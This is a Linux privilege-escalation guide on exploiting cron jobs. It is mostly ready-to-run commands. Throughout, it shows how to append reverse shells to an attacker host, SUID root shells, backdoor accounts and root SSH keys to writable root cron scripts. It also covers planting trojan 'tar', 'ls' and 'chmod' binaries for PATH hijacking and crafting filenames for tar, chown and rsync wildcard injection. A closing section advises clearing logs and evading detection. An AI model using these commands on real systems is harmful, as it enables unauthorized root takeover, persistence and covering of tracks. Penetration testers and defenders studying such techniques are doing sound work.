Cron job exploitation

Understanding Cron Job Vulnerabilities

What Makes Cron Jobs Dangerous

Cron jobs are scheduled tasks that run automatically at specified times with the privileges of their owner. They present excellent privilege escalation opportunities because they often run as root, execute scripts with weak permissions, or use relative paths that can be hijacked.

The Attack Principle: Exploit cron jobs that:

• Execute scripts or commands you can modify

• Use relative paths without specifying full binary locations

• Run as higher-privileged users (especially root)

• Process user-controllable input or files

• Have weak file permissions on their executables or configuration

Why This Works: Cron jobs run with the privileges of the user who owns the crontab entry. If you can modify what a root cron job executes, you gain root privileges when the job runs.

Cron Job Discovery and Enumeration

System-Wide Cron Job Discovery

Cron Configuration Files:

# Main system crontab
cat /etc/crontab

# System cron directories
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.monthly/
ls -la /etc/cron.weekly/

# Check all cron directory contents
find /etc/cron* -type f -exec cat {} \; 2>/dev/null

# Anacron configuration (for systems without permanent uptime)
cat /etc/anacrontab 2>/dev/null

User-Specific Cron Jobs:

# Current user's cron jobs
crontab -l

# All user cron jobs (if accessible)
ls -la /var/spool/cron/crontabs/ 2>/dev/null
cat /var/spool/cron/crontabs/* 2>/dev/null

# Alternative cron spool locations
ls -la /var/spool/cron/ 2>/dev/null
ls -la /var/cron/tabs/ 2>/dev/null

Systemd Timers (Modern Cron Alternative):

# List active systemd timers
systemctl list-timers
systemctl list-timers --all

# Timer configuration files
find /etc/systemd/system -name "*.timer" -exec cat {} \; 2>/dev/null
find /lib/systemd/system -name "*.timer" -exec cat {} \; 2>/dev/null
find /usr/lib/systemd/system -name "*.timer" -exec cat {} \; 2>/dev/null

# Check specific timer details
systemctl cat [timer-name].timer
systemctl status [timer-name].timer

Cron Job Analysis and Permission Checking

Script and Binary Permissions:

# Find all scripts referenced in cron jobs and check their permissions
grep -r "\.sh\|\.py\|\.pl\|\.rb" /etc/cron* 2>/dev/null | while read line; do
    script=$(echo "$line" | grep -oE "/[^[:space:]]+(\.sh|\.py|\.pl|\.rb)")
    if [ -f "$script" ]; then
        ls -la "$script"
    fi
done

# Check for world-writable cron scripts
find /etc/cron* -type f -perm -002 2>/dev/null
find /var/spool/cron -type f -perm -002 2>/dev/null

# Check for cron scripts writable by current user
find /etc/cron* -type f -writable 2>/dev/null

Cron Log Analysis:

# Check cron execution logs
cat /var/log/cron 2>/dev/null
cat /var/log/cron.log 2>/dev/null
grep CRON /var/log/syslog 2>/dev/null

# Check for recently executed cron jobs
journalctl -u cron.service 2>/dev/null
journalctl | grep -i cron 2>/dev/null

Direct Script Modification Attacks

Writable Cron Scripts

Finding Modifiable Scripts:

# Check if cron scripts are writable by current user
for cronfile in /etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/*; do
    if [ -f "$cronfile" ] && [ -w "$cronfile" ]; then
        echo "Writable cron file: $cronfile"
        ls -la "$cronfile"
    fi
done

# Find scripts referenced in cron jobs and check if writable
grep -r "sh\|py\|pl\|rb" /etc/cron* 2>/dev/null | grep -oE "/[^[:space:]]+" | while read script; do
    if [ -f "$script" ] && [ -w "$script" ]; then
        echo "Writable cron script: $script"
        ls -la "$script"
    fi
done

Script Modification for Privilege Escalation:

# If you find a writable script executed by root cron job

# Method 1: Add reverse shell
echo 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' >> /path/to/writable_script.sh

# Method 2: Add SUID shell creation
echo 'cp /bin/bash /tmp/rootshell && chmod +s /tmp/rootshell' >> /path/to/writable_script.sh

# Method 3: Add user creation
echo 'useradd -m hacker -s /bin/bash' >> /path/to/writable_script.sh
echo 'echo "hacker:Password123!" | chpasswd' >> /path/to/writable_script.sh
echo 'usermod -aG sudo hacker' >> /path/to/writable_script.sh

# Method 4: SSH key addition
echo 'mkdir -p /root/.ssh' >> /path/to/writable_script.sh
echo 'echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys' >> /path/to/writable_script.sh
echo 'chmod 600 /root/.ssh/authorized_keys' >> /path/to/writable_script.sh

# Wait for cron job to execute (check timing in crontab)

Path Hijacking in Cron Jobs

Understanding Cron PATH Issues

Why PATH Hijacking Works in Cron:

• Cron jobs often run with minimal PATH (usually just /usr/bin:/bin)

• Scripts may call commands without full paths

• You can create malicious binaries in PATH directories

• Cron doesn't inherit user's PATH modifications

Finding PATH-Vulnerable Cron Jobs:

# Check current cron PATH
grep -i path /etc/crontab

# Find cron jobs that use relative commands
grep -r -E "(^|[[:space:]])(ls|cat|cp|mv|rm|chmod|chown|tar|zip|unzip|wget|curl)[[:space:]]" /etc/cron* 2>/dev/null

# Look for commands without full paths in scripts
find /etc/cron* -type f -exec grep -l -E "(^|[[:space:]])[a-z]+" {} \; 2>/dev/null | while read file; do
    echo "=== $file ==="
    grep -E "(^|[[:space:]])[a-z]+" "$file" | head -5
done

PATH Hijacking Exploitation

Creating Malicious Binaries:

# If cron job calls 'tar' without full path and you can write to /tmp
# And if /tmp is in cron's PATH or you can modify PATH

# Create malicious tar binary
cat > /tmp/tar << 'EOF'
#!/bin/bash
# Execute original tar command to avoid suspicion
/bin/tar "$@"

# Add malicious payload
cp /bin/bash /tmp/rootshell
chmod +s /tmp/rootshell
EOF

chmod +x /tmp/tar

# If /tmp is not in PATH, try to find writable PATH directory
echo $PATH | tr ':' '\n' | while read dir; do
    if [ -d "$dir" ] && [ -w "$dir" ]; then
        echo "Writable PATH directory: $dir"
        cp /tmp/tar "$dir/tar"
    fi
done

Common Command Hijacking:

# Create malicious versions of commonly used commands in cron jobs

# Malicious 'ls' command
cat > /tmp/ls << 'EOF'
#!/bin/bash
/bin/ls "$@"
echo "hacker:x:0:0:root:/root:/bin/bash" >> /etc/passwd
EOF

# Malicious 'cp' command  
cat > /tmp/cp << 'EOF'
#!/bin/bash
/bin/cp "$@"
chmod +s /bin/bash
EOF

# Malicious 'chmod' command
cat > /tmp/chmod << 'EOF'
#!/bin/bash
/bin/chmod "$@"
/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' &
EOF

chmod +x /tmp/ls /tmp/cp /tmp/chmod

Wildcard Injection in Cron Jobs

Understanding Wildcard Vulnerabilities

Why Wildcards Are Dangerous:

• Cron jobs often use wildcards for file operations

• Wildcards expand to include filenames you create

• Malicious filenames can become command arguments

• File creation is often user-controllable

Finding Wildcard Usage:

# Search for wildcards in cron jobs
grep -r "\*" /etc/cron* 2>/dev/null

# Look for common dangerous patterns
grep -r -E "(rm|cp|mv|tar|zip)\s+.*\*" /etc/cron* 2>/dev/null
grep -r -E "find.*\*" /etc/cron* 2>/dev/null

Wildcard Exploitation Techniques

Tar Wildcard Injection:

# If cron job contains: tar -cf backup.tar /home/user/*

# Create malicious files in /home/user/
cd /home/user/
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=bash shell.sh'

# Create payload script
echo '#!/bin/bash' > shell.sh
echo 'cp /bin/bash /tmp/rootshell' >> shell.sh
echo 'chmod +s /tmp/rootshell' >> shell.sh
chmod +x shell.sh

# When cron runs: tar -cf backup.tar /home/user/*
# It becomes: tar -cf backup.tar /home/user/file1 /home/user/--checkpoint=1 /home/user/--checkpoint-action=exec=bash shell.sh
# The --checkpoint flags execute your script

Chown Wildcard Injection:

# If cron job contains: chown root:root /tmp/*

cd /tmp/
touch -- '--reference=/etc/passwd'
touch someFile

# When cron runs: chown root:root /tmp/*
# It becomes: chown root:root /tmp/--reference=/etc/passwd /tmp/someFile
# This changes someFile ownership to match /etc/passwd (root:root)

Rsync Wildcard Injection:

# If cron job contains: rsync -a /home/user/* /backup/

cd /home/user/
touch -- '-e sh shell.sh'
echo '#!/bin/bash' > shell.sh
echo '/bin/bash' >> shell.sh
chmod +x shell.sh

# When cron runs, rsync interprets -e sh shell.sh as remote shell execution

Monitoring and Real-Time Exploitation

Real-Time Cron Monitoring

Using pspy for Process Monitoring:

# Download and run pspy to monitor processes in real-time
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64

# Look for:
# - Cron jobs executing with high UIDs (root = UID 0)
# - Commands with relative paths
# - Scripts processing user-controllable files
# - Temporary file creation patterns

Timing-Based Exploitation

Determining Cron Job Schedule:

# Analyze cron timing from crontab entries
cat /etc/crontab | grep -v "^#" | while read line; do
    if [[ $line =~ [0-9] ]]; then
        echo "Cron schedule: $line"
    fi
done

# Calculate next execution time
# Format: minute hour day month day_of_week command
# * = every unit, */5 = every 5 units, 0-23 = range

Key Operational Considerations

Success Indicators

• Cron job executes your modified script or command

• Privilege escalation achieved (check with id after waiting for execution)

• File creation in expected locations (SUID shells, backdoor users)

• Log entries showing successful command execution

Common Failure Points

• No writable cron files or scripts found

• Absolute paths used in cron jobs prevent PATH hijacking

• Timing issues - cron jobs may run infrequently

• File permissions prevent modification of target files

• SELinux/AppArmor prevents exploitation

Timing Considerations

• Cron jobs timing varies from every minute to monthly

• System load can affect cron execution timing

• Race conditions require precise timing

• Log monitoring may detect unusual cron activity

Cleanup and Stealth

• Restore original files after exploitation

• Remove temporary malicious files created during exploitation

• Clear relevant logs if possible

• Maintain cron job functionality to avoid detection

Cron job exploitation requires patience and careful analysis, but often provides reliable privilege escalation paths due to the automated nature of scheduled tasks and common configuration mistakes.